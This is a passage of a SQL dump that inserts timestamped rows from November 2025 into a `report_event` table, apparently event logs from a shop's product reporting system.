(21851, '2025-11-06 20:59:06', 1, 2061, 0, 1, 1),
(21852, '2025-11-06 21:01:14', 1, 2064, 0, 1, 1),
(21853, '2025-11-06 21:06:17', 1, 2054, 0, 1, 1),
(21854, '2025-11-06 21:17:25', 1, 2062, 0, 1, 1),
(21855, '2025-11-06 21:37:22', 1, 2063, 0, 1, 1),
(21856, '2025-11-06 21:53:24', 1, 2059, 0, 1, 1),
(21857, '2025-11-06 22:06:13', 1, 2054, 0, 1, 1),
(21858, '2025-11-06 22:43:15', 1, 2061, 0, 1, 1),
(21859, '2025-11-06 22:43:19', 1, 2063, 0, 1, 1),
(21860, '2025-11-06 22:43:26', 1, 2062, 0, 1, 1),
(21861, '2025-11-06 22:52:48', 1, 2061, 0, 1, 1),
(21862, '2025-11-06 23:24:11', 1, 2060, 0, 1, 1),
(21863, '2025-11-07 01:18:02', 1, 2063, 0, 1, 1),
(21864, '2025-11-07 01:19:25', 1, 2055, 0, 1, 1),
(21865, '2025-11-07 01:45:17', 1, 2064, 0, 1, 1),
(21866, '2025-11-07 01:45:49', 1, 2062, 0, 1, 1),
(21867, '2025-11-07 02:23:19', 1, 2062, 0, 1, 1),
(21868, '2025-11-07 03:34:10', 1, 2059, 0, 1, 1),
(21869, '2025-11-07 03:54:53', 1, 2062, 0, 1, 1),
(21870, '2025-11-07 04:17:20', 1, 2058, 0, 1, 1),
(21871, '2025-11-07 05:37:27', 1, 2064, 0, 1, 1),
(21872, '2025-11-07 05:40:55', 1, 2060, 0, 1, 1),
(21873, '2025-11-07 08:35:53', 1, 2060, 0, 1, 1),
(21874, '2025-11-07 11:41:09', 1, 2064, 0, 1, 1),
(21875, '2025-11-07 14:39:33', 1, 2058, 0, 1, 1),
(21876, '2025-11-07 17:49:29', 1, 2054, 0, 1, 1),
(21877, '2025-11-07 18:10:26', 1, 2062, 0, 1, 1),
(21878, '2025-11-07 18:23:26', 1, 2054, 0, 1, 1),
(21879, '2025-11-07 18:58:02', 1, 2064, 0, 1, 1),
(21880, '2025-11-07 19:55:16', 1, 2064, 0, 1, 1),
(21881, '2025-11-07 20:22:07', 1, 2060, 0, 1, 1),
(21882, '2025-11-07 20:22:08', 1, 2064, 0, 1, 1),
(21883, '2025-11-07 20:22:08', 1, 2062, 0, 1, 1),
(21884, '2025-11-07 20:22:08', 1, 2064, 0, 1, 1),
(21885, '2025-11-07 20:22:08', 1, 2063, 0, 1, 1),
(21886, '2025-11-07 20:22:08', 1, 2064, 0, 1, 1),
(21887, '2025-11-07 20:22:08', 1, 2059, 0, 1, 1),
(21888, '2025-11-07 20:22:08', 1, 2058, 0, 1, 1),
(21889, '2025-11-07 20:22:08', 1, 2061, 0, 1, 1),
(21890, '2025-11-07 20:22:16', 1, 2064, 0, 1, 1),
(21891, '2025-11-07 20:22:16', 1, 2059, 0, 1, 1),
(21892, '2025-11-07 20:22:16', 1, 2063, 0, 1, 1),
(21893, '2025-11-07 20:22:16', 1, 2064, 0, 1, 1),
(21894, '2025-11-07 20:22:16', 1, 2062, 0, 1, 1),
(21895, '2025-11-07 20:22:16', 1, 2058, 0, 1, 1),
(21896, '2025-11-07 20:22:16', 1, 2061, 0, 1, 1),
(21897, '2025-11-07 20:22:16', 1, 2060, 0, 1, 1),
(21898, '2025-11-07 20:22:17', 1, 2064, 0, 1, 1),
(21899, '2025-11-07 20:22:22', 1, 2063, 0, 1, 1),
(21900, '2025-11-07 20:22:22', 1, 2054, 0, 1, 1),
(21901, '2025-11-07 20:22:22', 1, 2059, 0, 1, 1),
(21902, '2025-11-07 20:22:24', 1, 2055, 0, 1, 1),
(21903, '2025-11-07 20:22:25', 1, 2058, 0, 1, 1),
(21904, '2025-11-07 20:22:25', 1, 2064, 0, 1, 1),
(21905, '2025-11-07 20:22:25', 1, 2062, 0, 1, 1),
(21906, '2025-11-07 20:22:25', 1, 2060, 0, 1, 1),
(21907, '2025-11-07 20:22:25', 1, 2064, 0, 1, 1),
(21908, '2025-11-07 20:22:26', 1, 2064, 0, 1, 1),
(21909, '2025-11-07 20:22:26', 1, 2061, 0, 1, 1),
(21910, '2025-11-07 20:22:33', 1, 2054, 0, 1, 1),
(21911, '2025-11-07 20:22:35', 1, 2055, 0, 1, 1),
(21912, '2025-11-07 20:22:35', 1, 2054, 0, 1, 1),
(21913, '2025-11-07 20:22:36', 1, 2055, 0, 1, 1),
(21914, '2025-11-07 20:26:38', 1, 2059, 0, 1, 1),
(21915, '2025-11-07 22:06:14', 1, 2054, 0, 1, 1),
(21916, '2025-11-07 22:09:01', 1, 2060, 0, 1, 1),
(21917, '2025-11-08 00:04:14', 1, 2053, 0, 1, 1),
(21918, '2025-11-08 01:18:38', 1, 2063, 0, 1, 1),
(21919, '2025-11-08 01:57:26', 1, 2059, 0, 1, 1),
(21920, '2025-11-08 01:58:09', 1, 2062, 0, 1, 1),
(21921, '2025-11-08 02:43:17', 1, 2060, 0, 1, 1),
(21922, '2025-11-08 02:45:17', 1, 2058, 0, 1, 1),
(21923, '2025-11-08 02:48:28', 1, 2063, 0, 1, 1),
(21924, '2025-11-08 03:17:08', 1, 2061, 0, 1, 1),
(21925, '2025-11-08 03:59:59', 1, 2062, 0, 1, 1),
(21926, '2025-11-08 06:35:02', 1, 2060, 0, 1, 1),
(21927, '2025-11-08 06:49:49', 1, 2060, 0, 1, 1),
(21928, '2025-11-08 06:50:27', 1, 2054, 0, 1, 1),
(21929, '2025-11-08 07:13:10', 1, 2064, 0, 1, 1),
(21930, '2025-11-08 10:40:46', 1, 2064, 0, 1, 1),
(21931, '2025-11-08 10:47:54', 1, 2054, 0, 1, 1),
(21932, '2025-11-08 11:24:24', 1, 2062, 0, 1, 1),
(21933, '2025-11-08 11:51:38', 1, 2064, 0, 1, 1),
(21934, '2025-11-08 11:53:22', 1, 2064, 0, 1, 1),
(21935, '2025-11-08 11:56:51', 1, 2055, 0, 1, 1),
(21936, '2025-11-08 12:09:48', 1, 2054, 0, 1, 1),
(21937, '2025-11-08 16:05:24', 1, 2059, 0, 1, 1),
(21938, '2025-11-08 21:03:05', 1, 2061, 0, 1, 1),
(21939, '2025-11-08 21:23:40', 1, 2064, 0, 1, 1),
(21940, '2025-11-08 21:54:02', 1, 2064, 0, 1, 1),
(21941, '2025-11-08 22:19:36', 1, 2061, 0, 1, 1),
(21942, '2025-11-08 22:47:35', 1, 2054, 0, 1, 1),
(21943, '2025-11-08 23:04:29', 1, 2060, 0, 1, 1),
(21944, '2025-11-08 23:31:57', 1, 2064, 0, 1, 1),
(21945, '2025-11-08 23:33:40', 1, 2054, 0, 1, 1),
(21946, '2025-11-09 00:01:21', 1, 2060, 0, 1, 1),
(21947, '2025-11-09 02:02:37', 1, 2055, 0, 1, 1),
(21948, '2025-11-09 02:56:23', 1, 2055, 0, 1, 1),
(21949, '2025-11-09 04:06:24', 1, 2060, 0, 1, 1),
(21950, '2025-11-09 05:17:15', 1, 2063, 0, 1, 1),
(21951, '2025-11-09 06:08:17', 1, 2064, 0, 1, 1),
(21952, '2025-11-09 06:36:27', 1, 2064, 0, 1, 1),
(21953, '2025-11-09 07:30:27', 1, 2060, 0, 1, 1),
(21954, '2025-11-09 07:30:31', 1, 2059, 0, 1, 1),
(21955, '2025-11-09 08:51:19', 1, 2058, 0, 1, 1),
(21956, '2025-11-09 09:23:34', 1, 2064, 4233, 1, 1),
(21957, '2025-11-09 11:25:36', 1, 2055, 0, 1, 1),
(21958, '2025-11-09 11:41:45', 1, 2058, 0, 1, 1),
(21959, '2025-11-09 12:52:12', 1, 2054, 0, 1, 1),
(21960, '2025-11-09 13:13:34', 1, 2054, 0, 1, 1),
(21961, '2025-11-09 14:31:55', 1, 2054, 0, 1, 1),
(21962, '2025-11-09 14:49:30', 1, 2061, 0, 1, 1),
(21963, '2025-11-09 15:01:51', 1, 2062, 0, 1, 1),
(21964, '2025-11-09 16:18:59', 1, 2055, 0, 1, 1),
(21965, '2025-11-09 16:19:13', 1, 2064, 0, 1, 1),
(21966, '2025-11-09 16:35:54', 1, 2064, 0, 1, 1),
(21967, '2025-11-09 17:08:46', 1, 2063, 0, 1, 1),
(21968, '2025-11-09 17:38:58', 1, 2054, 0, 1, 1),
(21969, '2025-11-09 18:30:44', 1, 2062, 0, 1, 1),
(21970, '2025-11-09 18:32:22', 1, 2064, 0, 1, 1),
(21971, '2025-11-09 18:39:04', 1, 2058, 0, 1, 1),
(21972, '2025-11-09 19:01:14', 1, 2061, 0, 1, 1),
(21973, '2025-11-09 19:07:59', 1, 2054, 0, 1, 1),
(21974, '2025-11-09 19:25:39', 1, 2054, 0, 1, 1),
(21975, '2025-11-09 21:30:54', 1, 2061, 0, 1, 1),
(21976, '2025-11-09 21:52:05', 1, 2054, 0, 1, 1),
(21977, '2025-11-09 22:10:02', 1, 2062, 0, 1, 1),
(21978, '2025-11-09 22:13:01', 1, 2064, 0, 1, 1),
(21979, '2025-11-09 22:19:35', 1, 2061, 0, 1, 1),
(21980, '2025-11-09 22:34:09', 1, 2060, 0, 1, 1),
(21981, '2025-11-09 22:41:24', 1, 2054, 0, 1, 1),
(21982, '2025-11-09 23:45:33', 1, 2061, 0, 1, 1),
(21983, '2025-11-10 01:32:00', 1, 2062, 0, 1, 1),
(21984, '2025-11-10 01:40:28', 1, 2062, 0, 1, 1),
(21985, '2025-11-10 01:45:41', 1, 2061, 0, 1, 1),
(21986, '2025-11-10 01:58:15', 1, 2062, 0, 1, 1),
(21987, '2025-11-10 02:02:33', 1, 2061, 0, 1, 1),
(21988, '2025-11-10 02:16:22', 1, 2062, 0, 1, 1),
(21989, '2025-11-10 02:22:03', 1, 2061, 0, 1, 1);
INSERT INTO `report_event` (`event_id`, `logged_at`, `event_type_id`, `object_id`, `subject_id`, `subtype`, `store_id`) VALUES
(21990, '2025-11-10 04:12:09', 1, 2064, 0, 1, 1),
(21991, '2025-11-10 04:19:45', 1, 2062, 0, 1, 1),
(21992, '2025-11-10 04:22:42', 1, 2062, 0, 1, 1),
(21993, '2025-11-10 04:46:35', 1, 2055, 0, 1, 1),
(21994, '2025-11-10 04:52:45', 1, 2062, 0, 1, 1),
(21995, '2025-11-10 04:58:29', 1, 2061, 0, 1, 1),
(21996, '2025-11-10 05:13:06', 1, 2062, 0, 1, 1),
(21997, '2025-11-10 05:24:02', 1, 2061, 0, 1, 1),
(21998, '2025-11-10 05:26:00', 1, 2061, 0, 1, 1),
(21999, '2025-11-10 05:55:50', 1, 2062, 0, 1, 1),
(22000, '2025-11-10 06:16:10', 1, 2061, 0, 1, 1),
(22001, '2025-11-10 07:17:42', 1, 2064, 4260, 1, 1),
(22002, '2025-11-10 07:18:33', 1, 2062, 0, 1, 1),
(22003, '2025-11-10 08:03:55', 1, 2054, 0, 1, 1),
(22004, '2025-11-10 09:34:38', 1, 2055, 0, 1, 1),
(22005, '2025-11-10 09:34:41', 1, 2064, 0, 1, 1),
(22006, '2025-11-10 09:34:44', 1, 2061, 0, 1, 1),
(22007, '2025-11-10 09:34:47', 1, 2058, 0, 1, 1),
(22008, '2025-11-10 11:10:18', 1, 2063, 0, 1, 1),
(22009, '2025-11-10 11:10:20', 1, 2055, 0, 1, 1),
(22010, '2025-11-10 11:52:12', 1, 2053, 0, 1, 1),
(22011, '2025-11-10 14:02:10', 1, 2059, 0, 1, 1),
(22012, '2025-11-10 14:03:24', 1, 2062, 0, 1, 1),
(22013, '2025-11-10 14:04:15', 1, 2058, 0, 1, 1),
(22014, '2025-11-10 14:04:27', 1, 2063, 0, 1, 1),
(22015, '2025-11-10 14:53:59', 1, 2059, 0, 1, 1),
(22016, '2025-11-10 15:14:43', 1, 2055, 0, 1, 1),
(22017, '2025-11-10 16:12:49', 1, 2059, 0, 1, 1),
(22018, '2025-11-10 16:45:50', 1, 2060, 0, 1, 1),
(22019, '2025-11-10 16:59:13', 1, 2055, 0, 1, 1),
(22020, '2025-11-10 17:07:00', 1, 2063, 0, 1, 1),
(22021, '2025-11-10 17:12:22', 1, 2064, 0, 1, 1),
(22022, '2025-11-10 18:09:07', 1, 2062, 0, 1, 1),
(22023, '2025-11-10 18:25:43', 1, 2060, 0, 1, 1),
(22024, '2025-11-10 18:33:39', 1, 2064, 0, 1, 1),
(22025, '2025-11-10 18:55:56', 1, 2054, 0, 1, 1),
(22026, '2025-11-10 19:29:05', 1, 2060, 0, 1, 1),
(22027, '2025-11-10 19:30:32', 1, 2054, 0, 1, 1),
(22028, '2025-11-10 19:45:34', 1, 2058, 0, 1, 1),
(22029, '2025-11-10 19:45:39', 1, 2054, 0, 1, 1),
(22030, '2025-11-10 20:00:21', 1, 2054, 0, 1, 1),
(22031, '2025-11-10 21:08:18', 1, 2062, 0, 1, 1),
(22032, '2025-11-10 22:19:24', 1, 2064, 0, 1, 1),
(22033, '2025-11-10 22:19:29', 1, 2062, 0, 1, 1),
(22034, '2025-11-10 22:26:20', 1, 2064, 0, 1, 1),
(22035, '2025-11-10 22:39:24', 1, 2054, 0, 1, 1),
(22036, '2025-11-11 00:36:12', 1, 2061, 0, 1, 1),
(22037, '2025-11-11 00:58:21', 1, 2058, 0, 1, 1),
(22038, '2025-11-11 04:07:24', 1, 2058, 0, 1, 1),
(22039, '2025-11-11 04:17:08', 1, 2060, 0, 1, 1),
(22040, '2025-11-11 04:44:12', 1, 2064, 0, 1, 1),
(22041, '2025-11-11 05:39:31', 1, 2060, 0, 1, 1),
(22042, '2025-11-11 07:18:53', 1, 2060, 0, 1, 1),
(22043, '2025-11-11 07:53:24', 1, 2054, 0, 1, 1),
(22044, '2025-11-11 09:49:05', 1, 2054, 0, 1, 1),
(22045, '2025-11-11 10:05:43', 1, 2064, 0, 1, 1),
(22046, '2025-11-11 11:05:05', 1, 2060, 0, 1, 1),
(22047, '2025-11-11 13:17:19', 1, 2058, 0, 1, 1),
(22048, '2025-11-11 14:26:03', 1, 2060, 0, 1, 1),
(22049, '2025-11-11 16:20:50', 1, 2064, 0, 1, 1),
(22050, '2025-11-11 19:04:07', 1, 2064, 0, 1, 1),
(22051, '2025-11-11 19:40:50', 1, 2058, 0, 1, 1),
(22052, '2025-11-11 20:22:12', 1, 2054, 0, 1, 1),
(22053, '2025-11-11 20:22:13', 1, 2059, 0, 1, 1),
(22054, '2025-11-11 20:22:13', 1, 2064, 0, 1, 1),
(22055, '2025-11-11 20:22:13', 1, 2058, 0, 1, 1),
(22056, '2025-11-11 20:22:13', 1, 2062, 0, 1, 1),
(22057, '2025-11-11 20:22:13', 1, 2055, 0, 1, 1),
(22058, '2025-11-11 20:22:14', 1, 2060, 0, 1, 1),
(22059, '2025-11-11 20:22:14', 1, 2063, 0, 1, 1),
(22060, '2025-11-11 20:22:15', 1, 2061, 0, 1, 1),
(22061, '2025-11-11 21:18:19', 1, 2054, 0, 1, 1),
(22062, '2025-11-11 21:33:14', 1, 2060, 0, 1, 1),
(22063, '2025-11-12 02:02:18', 1, 2060, 0, 1, 1),
(22064, '2025-11-12 02:20:11', 1, 2058, 0, 1, 1),
(22065, '2025-11-12 02:37:59', 1, 2053, 0, 1, 1),
(22066, '2025-11-12 02:51:03', 1, 2055, 0, 1, 1),
(22067, '2025-11-12 02:54:25', 1, 2064, 0, 1, 1),
(22068, '2025-11-12 04:13:46', 1, 2063, 0, 1, 1),
(22069, '2025-11-12 04:21:06', 1, 2054, 0, 1, 1),
(22070, '2025-11-12 04:49:35', 1, 2054, 0, 1, 1),
(22071, '2025-11-12 05:34:34', 1, 2063, 0, 1, 1),
(22072, '2025-11-12 06:07:30', 1, 2054, 0, 1, 1),
(22073, '2025-11-12 06:54:58', 1, 2064, 0, 1, 1),
(22074, '2025-11-12 07:57:28', 1, 2059, 0, 1, 1),
(22075, '2025-11-12 10:13:49', 1, 2064, 0, 1, 1),
(22076, '2025-11-12 10:25:31', 1, 2063, 0, 1, 1),
(22077, '2025-11-12 10:37:32', 1, 2055, 0, 1, 1),
(22078, '2025-11-12 10:51:46', 1, 2059, 0, 1, 1),
(22079, '2025-11-12 11:06:28', 1, 2061, 0, 1, 1),
(22080, '2025-11-12 11:12:55', 1, 2062, 0, 1, 1),
(22081, '2025-11-12 13:20:31', 1, 2064, 0, 1, 1),
(22082, '2025-11-12 14:29:14', 1, 2054, 0, 1, 1),
(22083, '2025-11-12 18:39:27', 1, 2064, 0, 1, 1),
(22084, '2025-11-12 18:54:03', 1, 2063, 0, 1, 1),
(22085, '2025-11-12 19:29:34', 1, 2062, 0, 1, 1),
(22086, '2025-11-12 19:30:48', 1, 2064, 0, 1, 1),
(22087, '2025-11-12 19:32:53', 1, 2064, 0, 1, 1),
(22088, '2025-11-12 19:35:48', 1, 2054, 0, 1, 1),
(22089, '2025-11-12 20:10:54', 1, 2064, 0, 1, 1),
(22090, '2025-11-12 20:17:24', 1, 2060, 0, 1, 1),
(22091, '2025-11-12 21:06:06', 1, 2054, 0, 1, 1),
(22092, '2025-11-12 21:08:45', 1, 2060, 0, 1, 1),
(22093, '2025-11-12 21:13:32', 1, 2060, 0, 1, 1),
(22094, '2025-11-12 21:15:20', 1, 2064, 0, 1, 1),
(22095, '2025-11-12 21:28:55', 1, 2064, 0, 1, 1),
(22096, '2025-11-12 23:01:14', 1, 2064, 0, 1, 1),
(22097, '2025-11-13 01:05:40', 1, 2063, 0, 1, 1),
(22098, '2025-11-13 02:22:15', 1, 2062, 0, 1, 1),
(22099, '2025-11-13 03:32:06', 1, 2063, 0, 1, 1),
(22100, '2025-11-13 03:55:57', 1, 2062, 0, 1, 1),
(22101, '2025-11-13 04:07:12', 1, 2061, 0, 1, 1),
(22102, '2025-11-13 04:18:25', 1, 2058, 0, 1, 1),
(22103, '2025-11-13 07:23:19', 1, 2063, 0, 1, 1),
(22104, '2025-11-13 07:40:25', 1, 2055, 0, 1, 1),
(22105, '2025-11-13 10:14:57', 1, 2060, 0, 1, 1),
(22106, '2025-11-13 10:45:31', 1, 2064, 0, 1, 1),
(22107, '2025-11-13 11:40:11', 1, 2055, 0, 1, 1),
(22108, '2025-11-13 11:51:47', 1, 2054, 0, 1, 1),
(22109, '2025-11-13 12:50:33', 1, 2054, 0, 1, 1),
(22110, '2025-11-13 12:59:00', 1, 2064, 0, 1, 1),
(22111, '2025-11-13 13:09:32', 1, 2064, 0, 1, 1),
(22112, '2025-11-13 13:22:30', 1, 2063, 0, 1, 1),
(22113, '2025-11-13 13:39:11', 1, 2059, 0, 1, 1),
(22114, '2025-11-13 15:59:56', 1, 2060, 0, 1, 1),
(22115, '2025-11-13 16:14:31', 4, 2062, 4388, 1, 1),
(22116, '2025-11-13 17:33:39', 1, 2054, 0, 1, 1),
(22117, '2025-11-13 17:47:32', 1, 2059, 0, 1, 1),
(22118, '2025-11-13 18:57:21', 1, 2054, 0, 1, 1),
(22119, '2025-11-13 19:20:53', 1, 2064, 0, 1, 1),
(22120, '2025-11-13 20:35:22', 1, 2053, 0, 1, 1),
(22121, '2025-11-13 22:51:55', 1, 2062, 0, 1, 1),
(22122, '2025-11-13 22:52:04', 1, 2063, 0, 1, 1),
(22123, '2025-11-13 22:52:09', 1, 2061, 0, 1, 1),
(22124, '2025-11-13 22:56:39', 1, 2058, 0, 1, 1),
(22125, '2025-11-13 23:58:01', 1, 2060, 0, 1, 1),
(22126, '2025-11-14 03:23:55', 1, 2060, 0, 1, 1),
(22127, '2025-11-14 03:24:10', 1, 2063, 0, 1, 1),
(22128, '2025-11-14 03:57:22', 1, 2061, 0, 1, 1),
(22129, '2025-11-14 04:02:11', 1, 2060, 0, 1, 1),
(22130, '2025-11-14 05:59:10', 1, 2060, 0, 1, 1),
(22131, '2025-11-14 06:13:47', 1, 2059, 0, 1, 1),
(22132, '2025-11-14 06:51:45', 1, 2060, 0, 1, 1),
(22133, '2025-11-14 10:26:03', 1, 2059, 0, 1, 1),
(22134, '2025-11-14 12:02:09', 1, 2054, 0, 1, 1),
(22135, '2025-11-14 12:02:12', 1, 2055, 0, 1, 1),
(22136, '2025-11-14 12:02:14', 1, 2063, 0, 1, 1),
(22137, '2025-11-14 12:02:15', 1, 2060, 0, 1, 1),
(22138, '2025-11-14 12:02:16', 1, 2058, 0, 1, 1),
(22139, '2025-11-14 12:02:17', 1, 2059, 0, 1, 1),
(22140, '2025-11-14 12:02:18', 1, 2064, 0, 1, 1),
(22141, '2025-11-14 12:02:21', 1, 2061, 0, 1, 1),
(22142, '2025-11-14 12:02:22', 1, 2062, 0, 1, 1),
(22143, '2025-11-14 12:47:25', 1, 2064, 0, 1, 1),
(22144, '2025-11-14 13:21:45', 1, 2060, 0, 1, 1),
(22145, '2025-11-14 13:29:45', 1, 2064, 0, 1, 1),
(22146, '2025-11-14 13:32:28', 1, 2059, 0, 1, 1),
(22147, '2025-11-14 13:59:57', 1, 2054, 0, 1, 1),
(22148, '2025-11-14 14:04:22', 1, 2062, 0, 1, 1),
(22149, '2025-11-14 14:49:54', 1, 2061, 0, 1, 1),
(22150, '2025-11-14 17:10:40', 1, 2064, 0, 1, 1),
(22151, '2025-11-14 17:50:15', 1, 2058, 0, 1, 1),
(22152, '2025-11-14 19:11:03', 1, 2059, 0, 1, 1),
(22153, '2025-11-14 19:27:01', 1, 2062, 0, 1, 1),
(22154, '2025-11-14 20:38:51', 1, 2064, 0, 1, 1),
(22155, '2025-11-14 20:39:54', 1, 2053, 0, 1, 1),
(22156, '2025-11-14 21:37:15', 1, 2063, 0, 1, 1),
(22157, '2025-11-14 22:53:52', 1, 2062, 0, 1, 1),
(22158, '2025-11-14 23:32:31', 1, 2058, 0, 1, 1),
(22159, '2025-11-15 00:13:05', 1, 2054, 0, 1, 1),
(22160, '2025-11-15 00:25:16', 1, 2060, 0, 1, 1),
(22161, '2025-11-15 00:42:18', 1, 2062, 0, 1, 1),
(22162, '2025-11-15 01:46:37', 1, 2064, 0, 1, 1),
(22163, '2025-11-15 01:57:16', 1, 2054, 0, 1, 1),
(22164, '2025-11-15 02:38:43', 1, 2064, 0, 1, 1),
(22165, '2025-11-15 05:29:18', 1, 2064, 0, 1, 1),
(22166, '2025-11-15 05:55:48', 1, 2059, 0, 1, 1),
(22167, '2025-11-15 07:01:19', 1, 2060, 0, 1, 1),
(22168, '2025-11-15 09:10:54', 1, 2058, 0, 1, 1),
(22169, '2025-11-15 09:58:56', 1, 2060, 0, 1, 1),
(22170, '2025-11-15 10:21:00', 1, 2054, 0, 1, 1),
(22171, '2025-11-15 10:28:36', 1, 2064, 0, 1, 1),
(22172, '2025-11-15 11:26:49', 1, 2061, 0, 1, 1),
(22173, '2025-11-15 12:18:21', 1, 2055, 0, 1, 1),
(22174, '2025-11-15 13:31:26', 1, 2064, 0, 1, 1),
(22175, '2025-11-15 14:20:28', 1, 2064, 0, 1, 1),
(22176, '2025-11-15 14:28:47', 1, 2060, 0, 1, 1),
(22177, '2025-11-15 15:06:34', 1, 2063, 0, 1, 1),
(22178, '2025-11-15 15:33:23', 1, 2063, 0, 1, 1),
(22179, '2025-11-15 16:03:37', 1, 2054, 0, 1, 1),
(22180, '2025-11-15 16:03:49', 1, 2063, 0, 1, 1),
(22181, '2025-11-15 16:03:56', 1, 2055, 0, 1, 1),
(22182, '2025-11-15 16:04:01', 1, 2060, 0, 1, 1),
(22183, '2025-11-15 16:04:31', 1, 2058, 0, 1, 1),
(22184, '2025-11-15 16:04:48', 1, 2059, 0, 1, 1),
(22185, '2025-11-15 16:04:50', 1, 2064, 0, 1, 1),
(22186, '2025-11-15 16:04:52', 1, 2062, 0, 1, 1),
(22187, '2025-11-15 16:05:20', 1, 2061, 0, 1, 1),
(22188, '2025-11-15 16:06:16', 1, 2064, 0, 1, 1),
(22189, '2025-11-15 18:02:04', 1, 2054, 0, 1, 1),
(22190, '2025-11-15 18:34:25', 1, 2060, 0, 1, 1),
(22191, '2025-11-15 18:42:12', 1, 2062, 0, 1, 1),
(22192, '2025-11-15 18:43:30', 1, 2064, 0, 1, 1),
(22193, '2025-11-15 18:44:57', 1, 2054, 0, 1, 1),
(22194, '2025-11-15 21:03:08', 1, 2063, 0, 1, 1),
(22195, '2025-11-15 21:30:09', 1, 2055, 0, 1, 1),
(22196, '2025-11-15 21:38:43', 1, 2060, 0, 1, 1),
(22197, '2025-11-15 22:45:41', 1, 2054, 0, 1, 1),
(22198, '2025-11-16 01:41:50', 1, 2064, 0, 1, 1),
(22199, '2025-11-16 01:45:52', 1, 2064, 0, 1, 1),
(22200, '2025-11-16 02:34:14', 1, 2063, 0, 1, 1),
(22201, '2025-11-16 02:39:32', 1, 2053, 0, 1, 1),
(22202, '2025-11-16 02:59:32', 1, 2058, 0, 1, 1),
(22203, '2025-11-16 03:01:35', 1, 2059, 0, 1, 1),
(22204, '2025-11-16 04:47:56', 1, 2064, 0, 1, 1),
(22205, '2025-11-16 04:50:02', 1, 2064, 0, 1, 1),
(22206, '2025-11-16 05:24:53', 1, 2060, 0, 1, 1),
(22207, '2025-11-16 05:36:55', 1, 2061, 0, 1, 1),
(22208, '2025-11-16 05:59:35', 1, 2064, 0, 1, 1),
(22209, '2025-11-16 07:22:59', 1, 2059, 0, 1, 1),
(22210, '2025-11-16 07:23:02', 1, 2060, 0, 1, 1),
(22211, '2025-11-16 08:17:02', 1, 2054, 0, 1, 1),
(22212, '2025-11-16 08:29:27', 1, 2061, 0, 1, 1),
(22213, '2025-11-16 09:22:39', 1, 2062, 0, 1, 1),
(22214, '2025-11-16 10:26:48', 1, 2064, 0, 1, 1),
(22215, '2025-11-16 14:58:11', 1, 2064, 0, 1, 1),
(22216, '2025-11-16 15:17:34', 1, 2060, 0, 1, 1),
(22217, '2025-11-16 15:24:07', 1, 2054, 0, 1, 1),
(22218, '2025-11-16 15:53:29', 1, 2059, 0, 1, 1),
(22219, '2025-11-16 17:34:06', 1, 2053, 0, 1, 1),
(22220, '2025-11-16 18:43:44', 1, 2062, 0, 1, 1),
(22221, '2025-11-16 20:40:45', 1, 2060, 0, 1, 1),
(22222, '2025-11-16 21:20:43', 1, 2063, 0, 1, 1),
(22223, '2025-11-16 23:54:17', 1, 2060, 0, 1, 1),
(22224, '2025-11-17 00:05:57', 1, 2063, 0, 1, 1),
(22225, '2025-11-17 00:08:03', 1, 2060, 0, 1, 1),
(22226, '2025-11-17 00:27:24', 1, 2055, 0, 1, 1),
(22227, '2025-11-17 00:37:05', 1, 2058, 0, 1, 1),
(22228, '2025-11-17 01:23:04', 1, 2060, 0, 1, 1),
(22229, '2025-11-17 01:30:47', 1, 2063, 0, 1, 1),
(22230, '2025-11-17 01:48:59', 1, 2055, 0, 1, 1),
(22231, '2025-11-17 01:51:30', 1, 2058, 0, 1, 1),
(22232, '2025-11-17 02:19:42', 1, 2058, 0, 1, 1),
(22233, '2025-11-17 02:34:06', 1, 2055, 0, 1, 1),
(22234, '2025-11-17 02:55:27', 1, 2064, 0, 1, 1),
(22235, '2025-11-17 03:50:38', 1, 2061, 0, 1, 1),
(22236, '2025-11-17 03:55:11', 1, 2061, 0, 1, 1),
(22237, '2025-11-17 04:32:03', 1, 2062, 0, 1, 1),
(22238, '2025-11-17 04:59:17', 1, 2060, 0, 1, 1),
(22239, '2025-11-17 05:45:09', 1, 2054, 0, 1, 1),
(22240, '2025-11-17 05:53:47', 1, 2062, 0, 1, 1),
(22241, '2025-11-17 05:59:32', 1, 2059, 0, 1, 1),
(22242, '2025-11-17 06:11:27', 1, 2064, 0, 1, 1),
(22243, '2025-11-17 07:10:10', 1, 2054, 0, 1, 1),
(22244, '2025-11-17 08:46:17', 1, 2064, 0, 1, 1),
(22245, '2025-11-17 09:07:03', 1, 2063, 0, 1, 1),
(22246, '2025-11-17 14:49:30', 1, 2059, 0, 1, 1),
(22247, '2025-11-17 15:33:37', 1, 2061, 0, 1, 1),
(22248, '2025-11-17 16:02:17', 1, 2064, 0, 1, 1),
(22249, '2025-11-17 19:33:46', 1, 2062, 0, 1, 1),
(22250, '2025-11-17 19:39:46', 1, 2054, 0, 1, 1),
(22251, '2025-11-17 19:39:49', 1, 2058, 0, 1, 1),
(22252, '2025-11-17 20:23:17', 1, 2054, 0, 1, 1),
(22253, '2025-11-17 21:09:13', 1, 2062, 0, 1, 1),
(22254, '2025-11-17 22:37:15', 1, 2053, 0, 1, 1),
(22255, '2025-11-17 23:00:05', 1, 2058, 0, 1, 1),
(22256, '2025-11-17 23:20:58', 1, 2064, 0, 1, 1),
(22257, '2025-11-17 23:42:24', 1, 2059, 0, 1, 1),
(22258, '2025-11-18 00:18:30', 1, 2063, 0, 1, 1),
(22259, '2025-11-18 00:20:35', 1, 2055, 0, 1, 1),
(22260, '2025-11-18 00:36:37', 1, 2059, 0, 1, 1),
(22261, '2025-11-18 00:38:09', 1, 2062, 0, 1, 1),
(22262, '2025-11-18 00:38:11', 1, 2058, 0, 1, 1),
(22263, '2025-11-18 00:51:02', 1, 2063, 0, 1, 1),
(22264, '2025-11-18 00:54:19', 1, 2053, 0, 1, 1),
(22265, '2025-11-18 00:54:32', 1, 2061, 0, 1, 1),
(22266, '2025-11-18 00:55:10', 1, 2058, 0, 1, 1),
(22267, '2025-11-18 00:55:15', 1, 2059, 0, 1, 1),
(22268, '2025-11-18 00:57:21', 1, 2060, 0, 1, 1),
(22269, '2025-11-18 01:01:12', 1, 2064, 0, 1, 1),
(22270, '2025-11-18 02:14:38', 1, 2054, 0, 1, 1),
(22271, '2025-11-18 02:30:12', 1, 2062, 0, 1, 1),
(22272, '2025-11-18 03:10:57', 1, 2064, 4537, 1, 1),
(22273, '2025-11-18 03:48:24', 1, 2054, 0, 1, 1),
(22274, '2025-11-18 04:27:19', 1, 2053, 0, 1, 1),
(22275, '2025-11-18 04:44:28', 1, 2064, 0, 1, 1),
(22276, '2025-11-18 04:52:22', 1, 2061, 0, 1, 1),
